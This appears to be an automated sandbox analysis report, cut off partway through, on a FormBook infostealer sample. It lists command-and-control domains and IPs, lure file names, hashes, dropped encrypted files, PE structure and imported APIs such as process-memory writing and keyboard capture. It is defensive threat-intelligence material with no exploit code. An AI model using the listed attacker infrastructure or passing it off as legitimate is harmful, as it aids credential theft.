45.141.156.114	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
165.154.96.210	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	www.yunlekeji.top/t322/
165.154.96.210	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.yunlekeji.top/t322/
27.124.4.246	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/36be/
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/36be/
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	purchase Order.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
r0lqcud7.nbnnn.xyz	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	order confirmation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.225.159.42
	quotation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
www.madhf.tech	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	PO2412010.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order..exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	15.204.67.7
fap-a13f5c64.faipod.com	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
fap-a13f5c64.faipod.com	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
www.izmirescortg.xyz	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	Gz2FxKx2cM.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.186.192
	file.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	104.21.36.62

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BCPL-SGBGPNETGlobalASNSG	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	xsYbMYg5Dr.exe	Get hash	malicious	Unknown	Browse	137.220.229.26
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	134.122.133.80
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
YURTEH-ASUA	6.elf	Get hash	malicious	Unknown	Browse	152.89.63.57
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	152.89.61.96
	https://alluc.co/watch-movies/passengers.html	Get hash	malicious	Unknown	Browse	31.42.184.242
	Recibos.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
INTERHOPCA	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	arm4.elf	Get hash	malicious	Mirai	Browse	165.154.119.54
	i686.elf	Get hash	malicious	Mirai	Browse	165.154.144.14
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	165.154.119.65
	sh4.elf	Get hash	malicious	Mirai	Browse	165.154.120.14
	https://mj.ostep.net/acknowledgements	Get hash	malicious	Unknown	Browse	165.154.182.38
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	165.154.232.175
	http://www771771u.com/	Get hash	malicious	Unknown	Browse	165.154.224.29
	http://www.choeshop.com	Get hash	malicious	Unknown	Browse	165.154.254.46

Process:	C:\Windows\SysWOW64\mobsync.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut8F84.tmp

Download File

Process:	C:\Users\user\Desktop\AxKxwW9WGa.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.994736746549649
Encrypted:	true
SSDEEP:	6144:OsRpma3ZEPwqapkCACw6SQWgBpm1aTZXVUKZQLko2k4R3HM:Osn7tOCACw6SQWt4XVlCLT2k4xs
MD5:	B16951CB5D804EBF6D367022CCA20E54
SHA1:	04AC47E9165002A20C8BBADE23EFAFCB60E0B78D
SHA-256:	5E2C5FB62CFBD82DEF5ABDEB8D9731B355A64449EA14D7703ABEB918B51FB4BA
SHA-512:	B75BA72F4760DC4AE5A3064BBDA6DDABAE15DD951B018F16613DA4FCC3192E52DC331284A7D323D24788AD0EAC229D6319BCBB18B9B7A5A8FC0633D774E6C378
Malicious:	false
Reputation:	low
Preview:	...YP8A1CWX7..8B.D23I8ATsT2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS.YS8O..YX.[...6....P('.$@(&62Uy0Y/_(#xU7mJ7Yd[]i\|...9]#$j^5Sw8A1GWX7+L1..$U.tX&..4U.[...c3_.+....2*.X....)_..Z7Zz!#.8YS8A1GW.rRMtC6D...XAT3T2GAD.8[R3@:GW.3RM8B7D23I.UT3T"GAD3<YS8.1GGX7RO8B1D23I8AT5T2GADS8Y3<A1EWX7RM8@7..3I(AT#T2GATS8IS8A1GWH7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T.3$<'8YSL.5GWH7RMhF7D"3I8AT3T2GADS8Ys8AQGWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM

C:\Users\user\AppData\Local\Temp\molecast

Download File

Process:	C:\Users\user\Desktop\AxKxwW9WGa.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.994736746549649
Encrypted:	true
SSDEEP:	6144:OsRpma3ZEPwqapkCACw6SQWgBpm1aTZXVUKZQLko2k4R3HM:Osn7tOCACw6SQWt4XVlCLT2k4xs
MD5:	B16951CB5D804EBF6D367022CCA20E54
SHA1:	04AC47E9165002A20C8BBADE23EFAFCB60E0B78D
SHA-256:	5E2C5FB62CFBD82DEF5ABDEB8D9731B355A64449EA14D7703ABEB918B51FB4BA
SHA-512:	B75BA72F4760DC4AE5A3064BBDA6DDABAE15DD951B018F16613DA4FCC3192E52DC331284A7D323D24788AD0EAC229D6319BCBB18B9B7A5A8FC0633D774E6C378
Malicious:	false
Preview:	...YP8A1CWX7..8B.D23I8ATsT2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS.YS8O..YX.[...6....P('.$@(&62Uy0Y/_(#xU7mJ7Yd[]i\|...9]#$j^5Sw8A1GWX7+L1..$U.tX&..4U.[...c3_.+....2*.X....)_..Z7Zz!#.8YS8A1GW.rRMtC6D...XAT3T2GAD.8[R3@:GW.3RM8B7D23I.UT3T"GAD3<YS8.1GGX7RO8B1D23I8AT5T2GADS8Y3<A1EWX7RM8@7..3I(AT#T2GATS8IS8A1GWH7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T.3$<'8YSL.5GWH7RMhF7D"3I8AT3T2GADS8Ys8AQGWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM8B7D23I8AT3T2GADS8YS8A1GWX7RM

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.207246042382015
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AxKxwW9WGa.exe
File size:	1'224'192 bytes
MD5:	fbb92e684ce0e80f01a084850f8e38e1
SHA1:	82142b9ee9092eebbf2ab66b45185cd4e8142a63
SHA256:	0de849d3feff2b2fb9e28111e801534621851cf1bd0f01e1e18d28e07ca3ab32
SHA512:	98270b86fb6c7242d1d9ce03938ec4cc73faf89532c900858da96c3470a057797389e54f0b310152d0382bd7fdcf41a35847caf8836e87d070619a181d389958
SSDEEP:	24576:hu6J33O0c+JY5UZ+XC0kGso6FavoNn+m/as7jDTCWY:zu0c++OCvkGs9Favo1+mRD1Y
TLSH:	E345CF22B3DDC360CB669273BF69B7016EBF3C614630B85B2F980D7DA950161162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67518CE9 [Thu Dec 5 11:22:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007EFDD4DB686Ah
jmp 00007EFDD4DA9634h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007EFDD4DA97BAh
cmp edi, eax
jc 00007EFDD4DA9B1Eh
bt dword ptr [004C31FCh], 01h
jnc 00007EFDD4DA97B9h
rep movsb
jmp 00007EFDD4DA9ACCh
cmp ecx, 00000080h
jc 00007EFDD4DA9984h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007EFDD4DA97C0h
bt dword ptr [004BE324h], 01h
jc 00007EFDD4DA9C90h
bt dword ptr [004C31FCh], 00000000h
jnc 00007EFDD4DA995Dh
test edi, 00000003h
jne 00007EFDD4DA996Eh
test esi, 00000003h
jne 00007EFDD4DA994Dh
bt edi, 02h
jnc 00007EFDD4DA97BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007EFDD4DA97C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007EFDD4DA9815h
bt esi, 03h
jnc 00007EFDD4DA9868h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x625a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x625a8	0x62600	d889f8890aa3ea3e03aafb49b6d703fc	False	0.9336508298919949	data	7.90610822226288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x5986d	data			1.000329969102893
RT_GROUP_ICON	0x129028	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1290a0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1290b4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1290c8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1290dc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1291b8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, 